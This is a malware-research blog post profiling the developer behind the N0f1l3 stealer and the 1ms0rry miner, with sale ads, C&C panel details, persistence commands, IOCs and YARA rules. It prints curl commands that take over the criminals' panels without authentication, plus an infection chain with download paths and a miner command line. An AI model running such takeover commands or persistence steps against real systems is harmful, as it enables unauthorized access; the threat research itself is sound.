tag:blogger.com,1999:blog-3307138611699150212024-03-16T23:53:08.853-07:00benkow_Benkow_http://www.blogger.com/profile/00709869309686004611noreply@blogger.comBlogger12125tag:blogger.com,1999:blog-330713861169915021.post-6658350923929506762018-04-08T22:41:00.002-07:002020-10-31T09:45:33.799-07:00Sorry. Not sorry 1ms0rry. Atsamaz Gatsoev malware businessHey!</br>
Here we go for another write up, but this time with some friends :D</br>
Greetz to .sS.!, coldshell, fumik0_, siri_urz, VxVault, Cybercrime-Tracker, .sS.! (again).</br>
</br>
This post is a quick reminder for the "malware reasearcher" :</br>
<center><img src="https://i.imgur.com/40ewdJT.png" height=30% /></center>
Developing malware and selling them is lame and illegal.
</br></br>
<h2>Introduction</h2>
In this blogpost, we will try to present you another malware actor called 1ms0rry. This guy managed to make itself known by selling
a password stealer called N0f1l3 in some hack forums, and maybe you recognized him to be the man behind the miner "1ms0rry-Miner", which is pretty active in the wild these months.</br></br>
1ms0rry was selling builders or/and source code for his malware.</br></br>
<center><img src="https://i.imgur.com/Eoxx6HY.gif"/></center></br>
There is a huge probability that almost all the C&C are controlled by customers and not 1ms0rry himself.</br></br>
This write-up is exclusively about this malware developer, not botmaster(s). </br></br>
<h2>Malware Zoo</h2>
<h3>N0f1l3</h3>
The <a href="https://ifud.ws/threads/private-stealer-n0f1l3-admin-panel-by-ims0rry.13376/"> selling ads</a> (RU/Google translate)</br>
<center><a href="https://i.imgur.com/rWQstBf.png"><img src="https://i.imgur.com/rWQstBf.png" height=650px /></a> <a href="https://i.imgur.com/TsP4leZ.png"><img src="https://i.imgur.com/TsP4leZ.png" height=650px /></a></center></br>
<h4>The malware</h4>
The first one is a malware called N0F1L3. Spotted on some forums sold for 20$ the build or 600$ for the source code.</br>
This password stealer was developed for stealing: </br>
<ul>
<li>Browser passwords and cookies (Chrome, Opera, Kometa, Orbitum, Comodo, Amigo, Torch and Yandex)</li>
<li>Crypto-Currencies wallets (btc, electrum, ltc, eth, bcn, DSH, XMR, ZEC)</li>
<li>Filezilla passwords</li>
<li>Every file on the desktop with the extensions .txt .doc .docx .log</li>
</ul>
This malware is developed in .NET</br></br>
Files artefacts:</br>
<li><code>%TEMP%\Directory\Browsers\Passwords.txt</code></li>
<li><code>%TEMP%\Directory\Browsers\Cookies.txt</code></li>
<li><code>%TEMP%\Directory\Browsers\CC.txt</code></li>
<li><code>%TEMP%\Directory\Browsers\Autofill.txt</code></li>
<li><code>%TEMP%\[HIWD].zip</code></li>
</br>Directories:</br>
<li><code>%TEMP%\Directory\Files\Desktop</code></li>
<li><code>%TEMP%\Directory\Files\Filezilla</code></li>
<li><code>%TEMP%\Directory\Wallets\BitcoinCore</code></li>
<li><code>%TEMP%\Directory\Wallets\Electrum</code></li>
<li><code>%TEMP%\Directory\Wallets\LitecoinCore</code></li>
<li><code>%TEMP%\Directory\Wallets\Ethereum</code></li>
<li><code>%TEMP%\Directory\Wallets\Bytecoin</code></li>
<li><code>%TEMP%\Directory\Wallets\Monero</code></li>
<li><code>%TEMP%\Directory\Wallets\DashCore</code></li>
</br><center><img src="https://i.imgur.com/5AmnYRC.png" height=20% /></center></br>
Notice that there is no persistence even in the source code published or in the sample in the wild.</br>
In some sample we found this pdb:</br>
<code> C:\Users\gorno\Documents\Visual Studio 2015\Projects\ims0rry\ims0rry\obj\Release\n0f1l3.pdb</code></br>
this path is the 1ms0rry's computer we will understand why later.</br></br>
The interesting fact here it seems that this stealer is targeting Russian browser too.</br>
It focus on browsers like Yandex and this one is not really used outside Russia.</br>
</br>
<h4>The C&C</h4>
The login page:</br>
<center><a href="https://i.imgur.com/NMyxl0U.png"><img src="https://i.imgur.com/NMyxl0U.png" height=550px /></a></center></br>
The collected logs list:</br>
<center><a href="https://i.imgur.com/cT9IcPm.png"><img src="https://i.imgur.com/cT9IcPm.png" height=530px /></a></center></br>
Each collected log appears in a separated html file:</br>
<center><a href="https://i.imgur.com/YlfHlRF.pn"><img src="https://i.imgur.com/YlfHlRF.png" height=150px /></a></center></br>
Minimal settings:</br>
<center><a href="https://i.imgur.com/leAtlIK.png"><img src="https://i.imgur.com/leAtlIK.png" height=250px /></a></br></center>
And a search engine:</br>
<center><a href="https://i.imgur.com/UstaMfv.png"><img src="https://i.imgur.com/UstaMfv.png" height=300px /></a></center></br>
The panel is simple but efficient.</br></br>
<h4>Vulnerabilities</h4>
Since the panel has leaked almost everywhere, and the new versions are patched, let's have a view on the vulnerabilities available.</br>
You can easily change the admin password.</br>
If you look at the first lines of cmd.php (the gate):</br>
<iframe src="https://pastebin.com/embed_iframe/Uj1VTv2J/noheader" style="border:none;width:100%"></iframe>
</br>
You just need to send a POST requests with 3 parameters without authentication for changing the password</br></br>
<code>curl -i -X POST -d 'login=admin&password=lulz&change=1' http://n0f1l3cnc.com/cmd.php --header "Referer: http://n0f1l3cnc.com/settings.php"
</code>
</br>
</br>
The panel also have some unauthenticated iSQL</br>
<iframe src="https://pastebin.com/embed_iframe/3G6mLRAi/noheader" style="border:none;width:100%"></iframe>
</br></br>
<h4>IOCs</h4>
PDB related:</br>
C:\Users\gorno\Documents\Visual Studio 2015\Projects\ims0rry\ims0rry\obj\Release\n0f1l3.pdb</br>
C:\Users\gorno\Documents\Visual Studio 2015\Projects\n0f1l3v2\Release\Test.pdb</br></br>
CNCs and associated samples:</br>
<pre>
manganic-rumbles.000webhostapp.com
40cfb089f9e02a6038177cbec830f387622f5e2b268797682f67a56c303abee
tokar222.000webhostapp.com
b1def07459fbc7d417430edf70330e15ad8a775be00d8ccecd25ff240bd00884
ih871411.myihor.ru
2fdf25b8518afd461969fae0dded14500fc6a53dfe231eb8ceb7982a31df604c
9ville.000webhostapp.com
46483f88191566a4317d79f27f7a289e3503537ee9e1007661864df82ccc8338
lmdlm.xyz
0604de5851a210255b1314430b421573c19c374476260fc96de8924fab332581
jwad0w.000webhostapp.com
28a076ab9282cc2276e84ae3894d64e42af7a9deb26f0b575e526cd01196678b
iden1930.000webhostapp.com
Demo panel
</pre>
</br>
Yara:</br>
<pre>
rule n0f1l3: N0F1L3
{
meta:
description = "N0f1l3 Stealer"
date = "2018-04-06"
author = "coldshell"
reference = https://benkowlab.blogspot.com/2018/04/sorry-not-sorry-1ms0rry-atsamaz-gatsoev.html
strings:
$mz = {4D 5A}
$string1 = "\\Passwords.txt"
$string2 = "\\Cookies.txt"
$string3 = "\\CC.txt"
$string4 = "\\Autofill.txt"
$string5 = "\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data"
$mz at 0 and all of them
}
</pre>
</br></br>
<h4>N0f1leV2</h4>
we found a N0F1l3v2 in the wild</br>
This sample was injected in a malware cryptor named "Paradox Crypter"
<center><a href="https://i.imgur.com/THmhCGK.png"><img src="https://i.imgur.com/THmhCGK.png" height=359px /></a></center></br>
This cryptor is injected by c9a87d68a65ade147208ac8a6d68297877f145285e3f3f40ec01ea8d562fadc9 :</br>
<code>C:\Users\gorno\Documents\Visual Studio 2015\Projects\n0f1l3v2\Release\Test.pdb</code></br>
What's new in the v2?
It's now in C++, the stealer also support Firefox for the other part it's just N0f1l3 :)</br>
</br></br>
<h3>1ms0rry Miner</h3>
Here we go for the 2nd malware, this is a Loader + Miner.</br>
The <a href="https://darkwebs.ws/threads/33056/">selling ads</a> (RU/Google translate)(click to enlarge):</br>
<center><a href="https://i.imgur.com/csmp8ke.jpg"><img src="https://i.imgur.com/csmp8ke.jpg" height=850px/></a>
<a href="https://i.imgur.com/a3aACrb.jpg"><img src="https://i.imgur.com/a3aACrb.jpg" height=850px/></a></center>
</br>
Prices:</br>
<ul>
<li>CPU version - 3000 rubles</li>
<li>GPU version - 3000 rubles</li>
<li>EXTENDED version - 5500 rubles</li>
<li>PRIVATE version - from $ 2000 (discussed individually)</li>
<li>MULTIACC version - 40 000 rubles / month</li>
<li>SOURCE - 200 000 rubles</li>
<li>Bitcoin-purse substitution module - 500 rubles</li>
<li>Module stellera with admin panel - 2500 rubles</li>
<li>Resale of licenses is strictly prohibited (starting from 19.01.2018)</li>
</ul>
</br></br>
<h4>LoaderBot</h4>
Loaderbot is developed in .NET and it reuses a lot of code from N0f1l3.</br>
It have basic features.</br>
It kills itself if the task manager or process hacker are launched ("Hides from the task manager, process hacker (absolutely no processes)" feature in the ad).
<center><img src="https://i.imgur.com/nRfKyWg.png" height=300px /></center></br>
</br>
The malware installs itself in C:\users\%userprofile%\AppData\Roaming\Windows\</br>
Persistence is done by:</br>
<ul>
<li>Scheduled task: <code>"cmd", "/C "+"schtasks /create /tn \System\\SecurityServiceUpdate /tr %userprofile%\AppData\Roaming\Windows\" + currFilename + " /st 00:00 /du 9999:59 /sc daily /ri 1 /f;</code></li>
<li>Registry: <code>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</code></li>
<li>A .url file pointing to <code>URL=file://path/to/the/malware</code></li>
</ul>
Available features:
<ul>
<li>Update</li>
<li>Download</li>
<li>Execute</li>
</ul>
</br>
Connexion to the C&C is done by GET requests <code>http://cnc.com/cmd.php?</code> :</br>
<ul>
<li>hwid: Used as bot ID (VolumeSerialNumber)</li>
<li>timeout: timeout in case of CNC failure</li>
<li>completed: task ID completed</li>
</ul>
Using the User-Agent <code>"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"</code></br></br>
So, before infecting the victims with a Miner, the attacker install this loader.</br></br>
<h4>Miner</h4>
The .NET loader drop a miner developed in C++</br>
The first stage install the final miner:</br>
<ul>
<li>copy to <code>%userprofil%\\AppData\\Roaming\\Microsoft\\Windows\\winhost.exe</code></li>
<li>launch a scheduled task <code>schtasks /create /tn \\System\\SecurityService /tr %userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\winhost.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f</code></li>
<li>Hide the installed files via <code>attrib +s +h</code></li>
<li>Looks if taskmgr.exe or processhacker.exe are running</li>
<li>Detect if a Wallet address is in the clipboard and if so, replace it</li>
<li>Use RunPE to lauch a fake attrib.exe (final miner). RunPE is done via <code>CreateProcessA(Suspended)/SetThreadContext/WriteProcessMemoryResumeThread/</code>. This code is a copy paste from <a href="https://github.com/KernelMode/RunPE-ProcessHollowing">https://github.com/KernelMode/RunPE-ProcessHollowing</a></li>
</ul>
The final payload is a C++ miner based on xmrig:</br>
<center><a href="https://i.imgur.com/EXMHhZ2.png"><img src="https://i.imgur.com/EXMHhZ2.png" height=500px /></a></center></br></br>
<h4>The C&C</h4>
Login page:</br>
<center><a href="https://i.imgur.com/jXFiLFv.jpg"><img src="https://i.imgur.com/jXFiLFv.jpg" height=400px/></a></center></br>
Workers (hi IPv6 :) ):</br>
<center><a href="https://i.imgur.com/8AlECDX.png"><img src="https://i.imgur.com/8AlECDX.png" height=400px/></a></center></br>
Tasks:</br>
<center><a href="https://i.imgur.com/991Co1q.png"><img src="https://i.imgur.com/991Co1q.png" height=400px/></a></center></br>
Settings:</br>
<center><a href="https://i.imgur.com/RMxzzYF.png"><img src="https://i.imgur.com/RMxzzYF.png" height=400px/></a></center></br></br>
<h4>The admin C&C/Market</h4>
When 1ms0rry has developped the Miner, he also has developped a backend called SorryCoin.</br>
This panel is used by him and his resellers for building samples and support purpose.</br>
Here you can see 1ms0rry showing sorrycoins and asking for new resellers :
<center><a href="https://i.imgur.com/B2lZYbm.jpg"><img src="https://i.imgur.com/B2lZYbm.jpg" height=650px></a> <a href="https://i.imgur.com/pT9XLT0.jpg"><img src="https://i.imgur.com/pT9XLT0.jpg" height=650px></a></center></br>
Panel Instructions:</br>
<pre>
Информация о панели
Личная статистика
Личная статистика пользователя создана для удобства слежения за своими достижениями и прогрессом.
В ней будут отображено: общее кол-во сделанных билдов, кол-во продаж, кол-во рекриптов/чисток/выданных обновлений,
ваша должность, дата регистрации, кол-во заработанных денег, кол-во покупателей в черном списке и ваши SorryCoins
SorryCoins служат для определения вашего КПД в команде. За каждую чистку/рекрипт/обновление/продажу вам начисляется
определенное кол-во монет. Каждый месяц каждый участник команды будет получать от меня премию, равную кол-ву
его монет.
Билды
Основная страница. Служит для создания билдов майнера и бота. Необходимо заполнить поля: Пул, кошелек от пула
(к примеру майнергейта - www@mail.ru), пароль от пула (обычно x), логгер (ссылка для сбора айпи, если не нужен,
можно указать что угодно если поле не нужно), ссылка на админ-панель (на cmd.php файл,можно указать что угодно
если поле не нужно), биткоин кошелек подмены (для стиллера биткоинов, можно указать что угодно если поле не нужно),
цена (полная сумма,которую оплатил клиент), примечание (можно написать что угодно если поле не нужно),
тип билда и версию, которую приобрел покупатель После создания заявки вам необходимо подождать пока статус вашего
билда не изменится с queue (очередь) на done (сделано). Далее перейти по ссылкам, скачать файлы и передать клиенту
Расценки
Во вкладце "Расценки" опубликованы официальные цены на продукты и информация о вашем доходе с продажи каждого.
Они могут изменяться, так что проверяйте раз в день.
Общая статистика
В общей статистике будет отображен прогресс всей команды. Это: общее кол-во билдов, продаж,
рекриптов/чисток/обновлений, участников команды, заработанных денег, покупателей в черном списке
Материалы
В этой вкладке опубликованы самые последние материалы для майнера, информация о версиях майнера, бота и стаба.
Черный список
Раздел создан для удобства общения с клиентами (сарказм). Если вы кому-то отказываете в поддержке, необходимо
внести данного клиента в базу и написать его контакты, никнейм и причину отказа.
Лог посещений
Страница, доступная только админу. Отображает логи посещений пользователей. Позволяет выявлять шэринг аккаунта.
Пользователи
База пользователей (команды) в которой можно отследить прогресс других участников
TODO
Список того, что нужно сделать. Удобно, если вам нужно что-то записать. Для каждого индивидуальная записная
книжка - никто другой не сможет ее посмотреть.
</pre>
Google translate:</br>
<pre>
Panel Information
Personal stats
The personal statistics of the user is created for convenience of tracking of the achievements and progress.
It will display: the total number of builds made, the number of sales, the number of recs / purges / issued updates,
your position, the date of registration, the number of earned money, the number of buyers in the black list and your SorryCoins
SorryCoins serve to determine your efficiency in the team. For each cleaning / precription / update / sale you are credited
with a certain number of coins.
Each month each member of the team will receive from me a bonus equal to the number of his coins.
Builds
Main page. Serves to create a Miner and Bot build. You need to fill in the fields: Poole, purse from the pool
(for example, minergate - www@mail.ru),password from the pool (usually x), logger (link for collecting ip,
if you do not need it, you can specify anything if the field is not needed)
link to the admin panel (on the cmd.php file, you can specify anything if the field is not needed),
bitcoin substitution wallet (for the bitcoin styler, you can specify anything if the field is not needed),
the price (the total amount paid by the client) note (you can write anything if the field is not needed),
the build type and the version purchased by the buyer
After creating the application, you need to wait until the status of your build changes from the queue on done.
Next go to the links, download the files and send to the client
Pricing
In the "Prices" tab you can find official prices for products and information about your income from the sale of each.
They can change, so check it once a day.
general Statistics
The overall statistics will show the progress of the whole team. This: the total number of builds,
sales, recs / purges / updates, team members, earned money, buyers in the blacklist
Materials
In this tab the most recent materials for the miner, information about the versions of the miner, bot and stub are published.
Black list
The section is created for convenience of dialogue with clients (sarcasm). If you deny support to someone,
you need to enter this customer into the database and write his contacts, nickname and the reason for the refusal.
Log of visits
Page, accessible only to the administrator. Displays the logs of user visits. Allows you to identify account sharing.
Members List
Database of users (teams) in which you can track the progress of other participants
TODO
A list of what needs to be done. Convenient if you need to write something down.
For each individual notebook - no one else will be able to see it.
</pre>
Panels Overview:</br>
<center><a href="https://i.imgur.com/LrOEVz6.png" ><img src="https://i.imgur.com/LrOEVz6.png" height=450px/></a></center></br>
<center><a href="https://i.imgur.com/j2NERIp.png" ><img src="https://i.imgur.com/j2NERIp.png" height=450px /></a></center></br>
<center><a href="https://i.imgur.com/BxtBB2a.png" ><img src="https://i.imgur.com/BxtBB2a.png" height=350px/></a></center></br>
<center><a href="https://i.imgur.com/SP9L1j7.png" ><img src="https://i.imgur.com/SP9L1j7.png" height=450px /></a></center></br>
<center><a href="https://i.imgur.com/4jeYqOk.png" ><img src="https://i.imgur.com/4jeYqOk.png" height=350px /></a></center></br>
<center><a href="https://i.imgur.com/YY53Cbh.png" ><img src="https://i.imgur.com/YY53Cbh.png" height=450px /></a></center></br>
<center><a href="https://i.imgur.com/hYIeZbb.png" ><img src="https://i.imgur.com/hYIeZbb.png" height=450px /></a></center></br>
</br>
<h4>Vulnerabilities</h4>
As usual, code reuse = vuln reuse. The admin account takeover is still her:.</br>
<code>
curl -i -X POST -d 'login=admin&password=mypass¬e=&type=admin&useradd=1' http://S0rryCoinCnC/cmd.php --header "Referer: http://S0rryCoinCnC/users.php"
</code>
</br></br>
<h4>IOCs</h4>
PDB related:</br>
C:\Users\gorno\Documents\Visual Studio 2015\Projects\GPULoader\GPULoader\obj\Release\GPULoader.pdb</br>
c:\Users\User\Desktop\[NEW] builder\Bot\Miner\obj\Release\LoaderBot.pdb</br>
c:\inetpub\wwwroot\Bot\Miner\obj\Release\LoaderBot.pdb</br>
C:\Users\gorno\Desktop\RelWithDebInfo\xmrig.pdb</br>
C:\Users\gorno\Desktop\[NEW] builder\Miner\Release\winhost.pdb</br>
c:\Users\gorno\Desktop\[NEW] builder\Bot\Miner\obj\Release\LoaderBot.pdb</br></br>
CNCs and associated samples:</br>
<pre>
ih753479.myihor.ru
b25c3eda59e0014df05c9aa4451ab09c2153ddb919e105a693f1f8923e465157
ih894017.myihor.ru
e61d08bea42a6d2d49819e81e18b76db4413a1d80abeac8d8f8a75f18b940b24
ih895435.myihor.ru
867e605f0dc7d8e5aa62a9db99ebc8f12b1c09713707298c3c70e0294d14ebb7
ih903818.myihor.ru
a8c7f6dbc844a2b8b10e1751f65453b20392fa82caa9e83fcce3c496b3021fba
sawerticq.myihor.ru
45cec8803dd773469012d80afd3abf3eaf9a8f8b938a03ce8e52c2cba6dd28d2
pokerhot.ru
22fdc1c82acda24c3684f0cdc53128e6f24c32c564e0e8f0488d4d0f55ee7f2c
f448e4d1d52f46ab79ddf77f93fb28324439c2441c399d4224a570d87c1b556d
f3d8e6abc1b725b5bf73cf8ed39b517f00fd46e65dfa23432ec7119d4d3b4d64
d8287fd95435c00ef70c162a9bfd9b359e43d3b75cb764d5ec5b1d545b3f2133
0c0d58b488dafcfb632a7e020ceef22f95e68f9e6c55036f0a2f0b816da40bd1
95f89b82eda0548b93a0d62fb73446d32bdaa83d9d6ae4906a927d3e903e99e7
45551ae1c8cb97fe51b826f3f740ebcfd8ef061f14bcf458eeb2176b2d826050
aa9f2b763d3eebf6060e6b41c56520b2fd66fca87789dd6528703dcd33b67567
17ead882b04f22054b6ee06bf04e7b64eb7289a5c7f01f9faff397dad50287c6
ivanvarb.beget.tech
6de67141c7602544ca75cab06d840716d8eec9474bd744b39aa0f071b44ad16f
2e57dc399aeb974b12e299a042ae051ab09c039794dfc495b99e76f8a5aeb4bc
830bc74e10ac5a9baf6461081eed5496dc293145d184a10c60303b5f289835b6
8460ae8685964f1922dc1cbe1e19f6714d41b801487da647a6c6bea3ded3ac2c
600d00bb9b94b1164670c3e210271ba1623b9f44da681f66a8235e6c8e553470
3c44f07a1930bdcceae1bd01138a71fc2c9bf87138dc324477dbe39b9ae01bc0
a358e56c91218b5f21d54556fb7aef5de158da4764c9cf8e5d71e3e41ff4841f
49cb77361d08c86faf572829baa1ba06a7581254ddc45f074d67f72852c64152
195b79a3ee7275081aa538ba2e619864d9504c5bce6744334cfca5c5990fd1d2
26188b4be138b3bb3bef2d3a0eb98fbba83020f09bde0b2da4ee92f2c887df9c
5d286edf2f49dc61a3f70e6c25e13d92ae36f284b9b27440cc8f5bcd0084662e
2d98bd04d906c6600b6c2a1cf4ef2f60a2af1656b1a6f8b01913bd6d157a87b4
4d646cfc9cc82420a8d4028989322fb006eba07400ee4705f91fe1604cbe1513
b3648a2dbed0e1833b3278729c210144145696fd908aad3a4e991ef566d6d903
4c25f0f6a78b5bf7cb047446a458154cbbdf522c2bdea3daf2682eed168c7814
krasotka-kuphino.ru
2b099e9ab15b5056b0e4b09ea5751ecb76ebce1b02251c4a23fc133ea04918ee
81660ecc8467a284b689afdc3b60b5faa73b2a8385c57000e6c19f05944cf714
e5ecf75fe7991a351e52d64d14e6fb96c9d6eec7f5a0ccc64ea67753be03714a
6fa7da5f3026074b6c2a4b98865175f024941057a8c55d5516797f928a737195
panel.enable.pw
aa5037e15d6c2ea27fff9726cc3951660490273726edc9510a5e78d0afb82e68
t3h1337.se
76a811884030d751efac2ede5d5f8cb75bd2d72e7dee1327005838b5f08a8b28
d50a5373add2eb3e94a7b341781a3b09521e5c13387ace7f73995fe810c287ff
f31a16510da94c57ca0864562186a69540c5f2024f15d6d2eabd21f2a847fabc
66370e465351ce5da550f34afd0e03ff91fb906f077412a4c3f3c40a74c67e21
b037861cb7b32607f917146c2dc8e67109b9389ff1e2808c10681e7a953dd85c
0e346d3f905acff6aa5fe1479b7ce9a5957312838061620f624749d8ddb1e180
cbbce47b73a43b76c501717cd99243e2cbc226184e9828ca7887ac7d38fe5099
f11e1379b1d1f74d6ef738841eba0b7c125c8717f6411ce5cf12e695caf028c4
e3f5668ed13b860d5b90e3c9e99015ecef8985343ab4057c83fce3f8bc119bc8
4f443a5c0189878a20e9fe59642bc68c4d78c7ee4cd6a1f1e35fff25600fafb4
974a28dd21a0a25393180e9abf656d4e2583422c5d1102aeca7d839de29f10ac
cq95452.tmweb.ru
f80742032ff611f7e569f4f9b1d879377f81a3ae2a85e0234c161de5122058b0
2cfa2019f3002c7ea1f9cb1555caa5b84554f68e1cd54a436c9aa67a9359286f
uomomo.tmweb.ru
eb7d44264bc83c2f77958342aede1d2d266ee53380295ce9fd3e3630780031c9
67864.prohoster.biz
cd2874a83ca324eebbeaa134330d667aee72d28ded20bd44d4d48c91ce6474b1
109.234.36.233
a80038832522f8a4a0d5bfba7755ac73d506a0c523e8f86a4d7ae2dc798c0937
c577a5ddbdf85ab2a168223d80981cf1d835f15dbf0437cc43b5801cc37010a6
61d75bf9a006dcfea78e0c792cc4db7b0de82cd847d30680be08c463eaaf643f
sorry.enable.pw
2d6e94a539f89b3dfc3c8ced8ca7facf3840a3706fa6079a9328234133936143
zlives.ru
b0220a121e1daf7fc21f1869ceb4a588a1935ff4a7dbcc8660e8c661f40c26bb
66ce33495863914fee2bc0355d6911b0912150cbad0846721d9cf769858029b5
5da4dbdd3d67abcd38df00aabc4f9a9393751e89c98a08d9ce946c47d1672eff
aa4fd3dc52be981c482d955287c2c13f0b2535e5d351516a49f9150c62a92714
f15a876dcf2b9f226d4b61b847e3d15923cb04d7883a9aef757af3ed3d62f2b6
36e0a614810635c9c3d9091d91f476e1cce822ff6aba34e2f9ecb818faa018cb
3c14574aafdef0e216a289aff47704eb5d1071081594b2740f08a6fe6551dbfe
49755ff17be7bf0510fde970c2a6dd9d033b2b92322ae44b47276c28f7fdc78e
473cc575686c060c86aa5b78128832bdbbe4ce3352ce60a7e9c06dd36383b1b7
7f3e3ff028f521a50f1f8abd6549d092f198836993553e36e05981fe723daae3
ac865ff6cddbd825d459342dc1bbb91bee32cff945e4d717ad956d497acb213a
acf14c531bb5fc391a7a72ddd0e3ce9ea04939b8e6068f3667dc49896ffe90f4
81d51d7659dee946512cae617ea5215e2ca0945200d397052c1d4d137e810481
873bf7726cada94352ae15e5a7520187dfbf33b450131ba41148452f94adfaf9
58447db309ca8ec0090194d03f5fddda89b33ecce60306ea567e394c956caf23
d394e0115fb48be2492cd66f41def6070a0f171149177ad1fb5813d4a531d872
letstrytomoney.000webhostapp.com
79ad0aec7a30a8c3085256a6b36fafdc5448a6392ae79621356e6de6cede90ae
6ab8bbf76641e1f04252f7a8a579b2c7a493cd67452222a08260d3ef827113ff
1f3d0bf4afc4b31c0e1dac027636c0996cc99e474d6b85d68fd7e27c919d34e6
plaza777.co.ua
50587f56bc5cda5c9c49bfe233cea4a6da70207d34506865d215f6f84d75af17
v90327ux.beget.tech
efa35d539608624d3c70210ebd15e4a3103abc3fcbd5e47c76bcb25a10f3aae8
moneyrob.info
b6674acc2314913ad8c8ed14ce50c12b0f6babff3081969d7e2a1ab05f53af96
ce24411.tmweb.ru
c443c08c3071d3842b9cc26bbb34125e0baf894600f56b2aaab4519f488a31f3
294300b8ec1c41d0a0c71283d02bb359f6c9e38db2d630e1ec6087abf763730f
4da1b7cd2e6b5e53f4395eceb2d9180dec678e3c28cdff5ca54bb8526cef4bd8
56f9709e665738fd81d0880c4eecc45e678784880cdb83e9808bbff606d41cc9
a9bdf007c8a31e2034171fdfb20d07a51341e3e4977ef118a9764597d728a0b6
711ec24f2a2d1daff050a10fa3c3f2bf6b86a3ce02e785fe2327836ff2c4c9f1
68054.prohoster.biz
fefedc45386b83926aaa6893121bed424be0e0278319a5d97ee0cb74c7133144
5.200.55.248
karlikvm.beget.tech
61d094a1bd6305aa89193fdf9cb68ece3f28475b10adee1e71b9dfc96d0cb992
</pre>
Yara: </br>
<pre>
rule 1ms0rryMiner: 1ms0rryMiner
{
meta:
description = "1ms0rry Miner"
date = "2018-04-06"
author = "benkow_"
reference = https://benkowlab.blogspot.com/2018/04/sorry-not-sorry-1ms0rry-atsamaz-gatsoev.html
strings:
$mz = {4D 5A}
$string1 = "?hwid="
$string2 = "&completed="
$string3 = "?timeout=1"
$string4 = "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"
$string5 = "LoaderBot.Properties.Resources"
$mz at 0 and all of them
}
</pre></br></br>
<h2>Misc</h2>
</br>
TImeline: (click to enlarge)</br>
<center><a href="https://i.imgur.com/rGWGJL0.jpg"><img src="https://i.imgur.com/rGWGJL0.jpg" height=250px/></a></center>
</br>
</br>
<h4>Attack vectors</h4>
Some campaigns using 1ms0rry malware:</br>
<li>Fake fonts: <a href="https://www.malware-traffic-analysis.net/2017/11/27/index.htm">https://www.malware-traffic-analysis.net/2017/11/27/index.html</a> or <a href="https://www.malware-traffic-analysis.net/2017/11/12/index.htm">https://www.malware-traffic-analysis.net/2017/11/12/index.html</a> </li>
<li>Fake Flash installer : <a href="https://www.malware-traffic-analysis.net/2018/01/02/index2.html">https://www.malware-traffic-analysis.net/2018/01/02/index2.html</a></li>
<li><a href="https://www.hybrid-analysis.com/sample/e6aeef24c04a1d327e9b8337ca50c74f686ca041ac161a130ca31003ceaaaa7e?environmentId=100">>https://www.hybrid-analysis.com/sample/e6aeef24c04a1d327e9b8337ca50c74f686ca041ac161a130ca31003ceaaaa7e?environmentId=100</a> : This sample is really interesting.</li>
The infection chain is :</br>
<pre>
github.com/vaio666999/2/blob/master/GoogleUpdater.exe << LoaderBot :: sorry.enable.pw/cmd.php?hwid=24C2B6A0
github.com/vaio666999/2/raw/master/GoogleUpdate.exe << Rarog :: api.enable.pw/2.0/method/checkConnection
github.com/vaio666999/2/raw/master/xmrig32.exe User-Agent: Mozilla/5.0 (Windows NT 6.1) Rarog/5.0
xmrig32.exe -o xmr.pool.minergate.com:45560 -u stasmiomi@gmail.com -p x -k -t 1
</pre>
61d094a1bd6305aa89193fdf9cb68ece3f28475b10adee1e71b9dfc96d0cb992 is <a href="https://researchcenter.paloaltonetworks.com/2018/04/unit42-smoking-rarog-mining-trojan/">Rarog</a>
<li>Backdoored software: </li>
efa35d539608624d3c70210ebd15e4a3103abc3fcbd5e47c76bcb25a10f3aae8 - RDP Bruter</br>
76a811884030d751efac2ede5d5f8cb75bd2d72e7dee1327005838b5f08a8b28 - WinDjView setup</br>
c9a87d68a65ade147208ac8a6d68297877f145285e3f3f40ec01ea8d562fadc9 - Paradox Crypter</br>
</br>
</br>
<h4>Competitive analysis</h4>
This actor is really active on his GitHub. Thanks to him, this is a gold mine to have some information about what is going on seller forums.
He decompiled a bunch of malware and analyzed them on telegra.ph and pushed all sources on his repository.
This is a good way for him to check if there is no copycat for his miner. For example, when he analyzed a miner developed by EvilBanana.
He mentioned that is a bad copy of "his" miner explicitly : </br></br>
<center><img src="https://i.imgur.com/KqyAxoI.png" height=50%/></center></br>
the highlight sentence means "this miner turned out
to be my miner of the first version, but it's a little broken for some reason" </br></br>
He reviewed some diversity of malware/tools (miners, botnet, loaders...) and tried to explain if features were really well developed and effective, or it's just basic crappy stuff.. </br></br>
Reviews are available there :
<li><a href="http://telegra.ph/Analiz-skrytogo-majnera-ot-Dzotra-12-31">http://telegra.ph/Analiz-skrytogo-majnera-ot-Dzotra-12-31</a></li>
<li><a href="http://telegra.ph/Analiz-botneta-DarkSky-12-30">http://telegra.ph/Analiz-botneta-DarkSky-12-30</a></li>
<li><a href="http://telegra.ph/Analiz-skrytogo-majnera-ot-Hostis666-12-20">http://telegra.ph/Analiz-skrytogo-majnera-ot-Hostis666-12-20</a></li>
<li><a href="http://telegra.ph/Analiz-skrytogo-majnera-ot-GucciMine-12-05">http://telegra.ph/Analiz-skrytogo-majnera-ot-GucciMine-12-05</a></li>
<li><a href="http://telegra.ph/Pishem-kejlogger-na-C-12-07">http://telegra.ph/Pishem-kejlogger-na-C-12-07</a></li>
<li><a href="http://telegra.ph/Analiz-skrytogo-majnera-ot-Proga-12-10">http://telegra.ph/Analiz-skrytogo-majnera-ot-Proga-12-10</a></li>
<li><a href="http://telegra.ph/Analiz-skrytogo-majnera-ot-Eduard1337Vans-12-10">http://telegra.ph/Analiz-skrytogo-majnera-ot-Eduard1337Vans-12-10</a></li>
<li><a href="http://telegra.ph/Pishem-nerezidentnyj-RunPE-loader-na-C-12-12">http://telegra.ph/Pishem-nerezidentnyj-RunPE-loader-na-C-12-12</a></li>
<li><a href="http://telegra.ph/Analiz-skrytogo-majnera-ot-EvilBanana-ims0rry-12-25">http://telegra.ph/Analiz-skrytogo-majnera-ot-EvilBanana-ims0rry-12-25</a></li>
<li><a href="http://telegra.ph/Pishem-miniatyurnyj-HTTP-flooder-na-Python-3-12-28">http://telegra.ph/Pishem-miniatyurnyj-HTTP-flooder-na-Python-3-12-28</a></li>
